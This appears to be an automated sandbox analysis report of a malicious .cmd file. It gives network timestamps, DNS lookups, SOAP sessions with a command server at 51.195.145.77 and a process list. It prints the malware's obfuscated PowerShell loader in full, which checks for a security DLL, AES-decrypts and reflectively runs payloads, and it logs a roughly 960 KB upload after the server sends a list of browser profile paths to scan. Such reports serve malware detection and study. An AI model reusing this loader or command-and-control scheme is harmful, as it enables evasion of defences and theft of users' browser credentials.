              Oct 16, 2024 20:39:20.298521996 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298531055 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298540115 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298552036 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298561096 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298576117 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298584938 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298634052 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298644066 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298654079 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298672915 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298793077 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298804045 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298813105 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298825026 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298834085 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298842907 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298852921 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298861980 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298930883 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298940897 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298948050 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298958063 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298966885 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.298975945 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299048901 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299060106 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299069881 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299078941 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299088955 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299098015 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299153090 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299163103 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299166918 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299170971 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299180984 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299194098 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299299002 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299308062 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299318075 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299328089 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299336910 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299348116 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299447060 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299458027 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299462080 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299465895 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299468994 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299478054 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299487114 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299505949 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299562931 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299571037 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299580097 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299590111 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299598932 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299742937 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299752951 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299761057 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299771070 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299781084 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299791098 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299810886 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299820900 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299830914 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299868107 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299877882 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299886942 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.299896002 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300105095 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300115108 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300127029 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300136089 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300154924 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300164938 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300173044 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300276995 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300292015 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300302029 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300311089 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300328970 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300359964 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300435066 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300467014 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300476074 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300512075 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300522089 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300630093 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300641060 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.300652027 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303158998 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303443909 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303505898 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303668976 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303792000 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303855896 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303864956 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303874969 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303885937 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.303899050 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304205894 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304263115 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304271936 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304280996 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304291964 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304311037 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304320097 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304332972 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304342985 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304354906 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304374933 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304383993 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304558039 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304567099 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304575920 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304644108 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304662943 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304672003 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304785013 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304794073 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304802895 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304812908 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304825068 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304833889 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304886103 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304898024 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304907084 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.304919004 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305031061 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305039883 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305049896 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305058956 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305068016 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305078030 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305088043 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305097103 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305105925 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305118084 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305128098 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305139065 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305149078 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305157900 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305176020 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305284023 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305294991 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305305004 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305315018 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305324078 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305332899 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305380106 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305389881 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305399895 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305408955 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305418015 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305428028 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305443048 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305454016 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305532932 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305542946 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305552006 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305561066 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305629015 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305639029 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305649042 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305659056 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305666924 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.305680037 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.309540987 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.692446947 CEST579424970751.195.145.77192.168.2.8
              Oct 16, 2024 20:39:20.744509935 CEST4970757942192.168.2.851.195.145.77
              Oct 16, 2024 20:39:20.764790058 CEST4970757942192.168.2.851.195.145.77
              Oct 16, 2024 20:39:20.765263081 CEST4970557942192.168.2.851.195.145.77
              TimestampSource PortDest PortSource IPDest IP
              Oct 16, 2024 20:39:15.805913925 CEST5378353192.168.2.81.1.1.1
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 16, 2024 20:39:15.805913925 CEST192.168.2.81.1.1.10x5324Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 16, 2024 20:39:15.813205004 CEST1.1.1.1192.168.2.80x5324No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
              • 51.195.145.77:57942
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.84970451.195.145.77579422768C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 16, 2024 20:39:08.564331055 CEST240OUTPOST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
              Host: 51.195.145.77:57942
              Content-Length: 137
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive
              Oct 16, 2024 20:39:09.331527948 CEST359INHTTP/1.1 200 OK
              Content-Length: 212
              Content-Type: text/xml; charset=utf-8
              Server: Microsoft-HTTPAPI/2.0
              Date: Wed, 16 Oct 2024 18:39:09 GMT
              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.84970551.195.145.77579422768C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 16, 2024 20:39:14.416687965 CEST223OUTPOST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
              Host: 51.195.145.77:57942
              Content-Length: 144
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Oct 16, 2024 20:39:15.250380039 CEST1236INHTTP/1.1 200 OK
              Content-Length: 4744
              Content-Type: text/xml; charset=utf-8
              Server: Microsoft-HTTPAPI/2.0
              Date: Wed, 16 Oct 2024 18:39:15 GMT
              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.84970751.195.145.77579422768C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 16, 2024 20:39:18.741471052 CEST245OUTPOST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
              Host: 51.195.145.77:57942
              Content-Length: 959963
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive
              Oct 16, 2024 20:39:20.281784058 CEST294INHTTP/1.1 200 OK
              Content-Length: 147
              Content-Type: text/xml; charset=utf-8
              Server: Microsoft-HTTPAPI/2.0
              Date: Wed, 16 Oct 2024 18:39:20 GMT
              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
              Oct 16, 2024 20:39:20.284725904 CEST217OUTPOST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
              Host: 51.195.145.77:57942
              Content-Length: 959955
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Oct 16, 2024 20:39:20.692446947 CEST408INHTTP/1.1 200 OK
              Content-Length: 261
              Content-Type: text/xml; charset=utf-8
              Server: Microsoft-HTTPAPI/2.0
              Date: Wed, 16 Oct 2024 18:39:20 GMT
              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:14:39:03
              Start date:16/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" "
              Imagebase:0x7ff65f780000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:14:39:03
              Start date:16/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6ee680000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:14:39:03
              Start date:16/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "
              Imagebase:0x7ff65f780000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:14:39:03
              Start date:16/10/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x960000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:14:39:04
              Start date:16/10/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              Imagebase:0x960000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >
                Memory Dump Source
